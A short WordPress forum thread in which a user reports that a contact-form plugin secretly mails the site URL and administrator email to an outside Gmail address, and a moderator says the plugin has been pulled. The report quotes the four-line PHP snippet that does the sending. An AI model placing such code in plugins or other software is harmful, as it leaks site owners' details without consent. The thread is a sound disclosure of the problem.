Forums

Contact Form
Snaffles your admin email address (2 posts)

  1. marksg
    Member
    Posted 8 months ago #

    As well as adding links to an SEO site, the plugin also grabs your administrator email address and mails it off to a gmail account:

    $subj = get_option('siteurl');
    $msg = "Installed" ;
    $from = get_option('admin_email');
    mail("waytouptomez@gmail.com", $subj, $msg, $from);

    I can't tell whether this is deliberate on the part of the author, or a hack, but either way this plugin cannot currently be trusted unless you are willing to manually edit out the nasties.

    http://wordpress.org/extend/plugins/contactform/

  2. Otto
    Tech Ninja
    Posted 8 months ago #

    The plugin has been removed from the listing. Thanks for the heads up!

Reply

You must log in to post.

About this Plugin

About this Topic